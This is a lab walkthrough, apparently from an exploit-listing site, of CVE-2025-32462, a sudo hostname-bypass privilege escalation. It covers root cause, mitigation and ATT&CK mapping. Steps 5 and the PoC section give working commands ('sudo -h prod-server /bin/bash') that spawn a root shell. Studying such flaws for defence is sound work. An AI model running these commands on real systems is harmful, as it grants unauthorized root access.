## https://sploitus.com/exploit?id=5AE37668-FD28-5BD2-AAC6-819F90BE934C
# CVE-2025-32462 â Sudo Hostname Bypass Privilege Escalation



---
## Table of Contents
1. Overview
2. Vulnerability Details
3. Impact
4. Lab Environment
5. Verification of Vulnerable Version
6. User & sudoers Configuration
7. Exploitation Walkthrough
8. Proof of Concept Summary
9. Why Ubuntu Is Not Vulnerable
10. Mitigation
11. MITRE ATT&CK Mapping
12. References
13. Disclaimer
## Overview
CVE-2025-32462 is a **local privilege escalation vulnerability** in `sudo` that allows a lowâprivileged user to execute commands as **root** by abusing **hostnameârestricted sudo rules**. The issue lies in how `sudo` historically handled the `-h` (host) option during authorization checks.
When a sudoers rule is restricted to a specific hostname, `sudo` should only permit execution when the system hostname matches the rule. Due to flawed logic, affected versions trusted a **userâsupplied hostname** via `sudo -h`, allowing attackers to bypass the restriction entirely.
---
## Vulnerability Details
* **CVE ID:** CVE-2025-32462
* **Type:** Local Privilege Escalation
* **Affected Component:** sudo
* **Attack Vector:** Local
* **Privileges Required:** Low (nonâsudo user)
* **User Interaction:** None
### Root Cause
`sudo` allowed the `-h ` argument to influence authorization decisions. In vulnerable versions, the supplied hostname was trusted during sudoers rule evaluation, instead of strictly validating against the systemâs real hostname.
As a result, hostâbased sudo restrictions could be bypassed.
---
## Impact
If exploited successfully, a local attacker can:
* Execute arbitrary commands as **root**
* Fully compromise the system
* Bypass administrative security boundaries
In realâworld environments, this vulnerability is particularly dangerous in:
* Multiâuser systems
* Hardened environments using hostâspecific sudo rules
* Bastion or jump hosts
---
## Lab Environment
| Component | Details |
| -------------- | -------------------------------- |
| OS | Debian 11 (Bullseye â unpatched) |
| sudo Version | ⤠1.9.13 |
| Access Level | Local user |
| Virtualization | VirtualBox |
> â ď¸ **Note:** Modern Ubuntu and Debian releases have backported patches while retaining similar version strings. This vulnerability **cannot be reproduced** on patched systems.
---
## Step 1 â Verify Vulnerable sudo Version
```bash
sudo --version
```
Expected (vulnerable):
```
Sudo version 1.9.5p2
```
---
## Step 2 â Create LowâPrivileged User
```bash
sudo useradd -m attacker
sudo passwd attacker
groups attacker
```
Expected:
```
attacker : attacker
```
The user must **not** belong to the `sudo` group.
---
## Step 3 â Configure Vulnerable sudoers Rule
Edit sudoers safely:
```bash
sudo visudo
```
Add the following line:
```
attacker prod-server = (root) ALL
```
* `prod-server` is a **fake hostname**
* The real system hostname must be different
Verify:
```bash
sudo -l -U attacker
```
Expected:
```
User attacker may run the following commands on prod-server:
(root) ALL
```
---
## Step 4 â Confirm Normal sudo Is Denied
Switch user:
```bash
su - attacker
```
Attempt sudo normally:
```bash
sudo id
```
Expected:
```
attacker is not allowed to run sudo on
```
---
## Step 5 â Exploitation (CVE-2025-32462)
Trigger the vulnerability:
```bash
sudo -h prod-server id
```
Successful exploitation output:
```
uid=0(root) gid=0(root) groups=0(root)
```
Spawn a root shell:
```bash
sudo -h prod-server /bin/bash
```
Verify:
```bash
id
```
---
## Proof of Concept Summary
### Automated PoC Script (Optional)
```bash
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id
```
Save as `exploit.sh`, make executable, and run as the `attacker` user:
```bash
chmod +x exploit.sh
./exploit.sh
```
| Action | Result |
| ------------------------ | -------- |
| Normal sudo | â Denied |
| `sudo -h prod-server id` | â Root |
This confirms a successful privilege escalation.
---
## Why Ubuntu Is Not Vulnerable
Modern Ubuntu releases appear to ship with sudo versions that fall within the affected range. However, Ubuntu has **backported the security fix** for CVEâ2025â32462 without changing the upstream version string.
As a result:
* The `sudo -h` option no longer influences authorization checks
* Hostname spoofing is correctly rejected
* The vulnerability cannot be reproduced despite similar version numbers
This highlights the importance of validating vulnerability status using **behavioral testing**, not version strings alone.
---
## Mitigation
* Upgrade `sudo` to a patched version
* Remove hostârestricted sudo rules where possible
* Monitor local privilege escalation attempts
---
## MITRE ATT&CK Mapping
* **TA0004 â Privilege Escalation**
* **T1548.003 â Abuse Elevation Control Mechanism (sudo)**
---
## References
* CVEâ2025â32462 Advisory
* sudo Project Security Announcements
* Debian Security Tracker
---
## Disclaimer
This walkthrough is for **educational and defensive security research purposes only**. Do not test this vulnerability on systems you do not own or have explicit permission to assess.